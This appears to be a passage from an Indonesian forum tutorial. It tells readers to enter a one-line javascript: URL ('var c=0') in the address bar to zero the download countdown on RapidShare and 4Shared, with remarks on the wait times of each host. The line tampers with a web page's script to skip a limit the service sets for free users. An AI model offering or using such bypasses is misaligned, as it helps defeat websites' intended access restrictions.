java script:var c=0

atau
Quote:

java script:alert(c=0)

PERHATIAN!!!
KATA “java” dengan “script”nya mohon digabung!!!!

4) Lalu tombol Download (RapidShare) atau Download Link (4Shared) akan muncul. Klik tombol/link tersebut dan happy downloading!!!!

Note:
Untuk 4Shared, kelihatannya anda tidak memerlukan teknik ini karena 4Shared waktu tunggunya cukup cepat. Bahkan saat saya selesai mengetikkan kode diatas, link downloadnya sudah muncul. Tetapi ini wajar di RapidShare karena waktu tunggunya cukup lama

Comment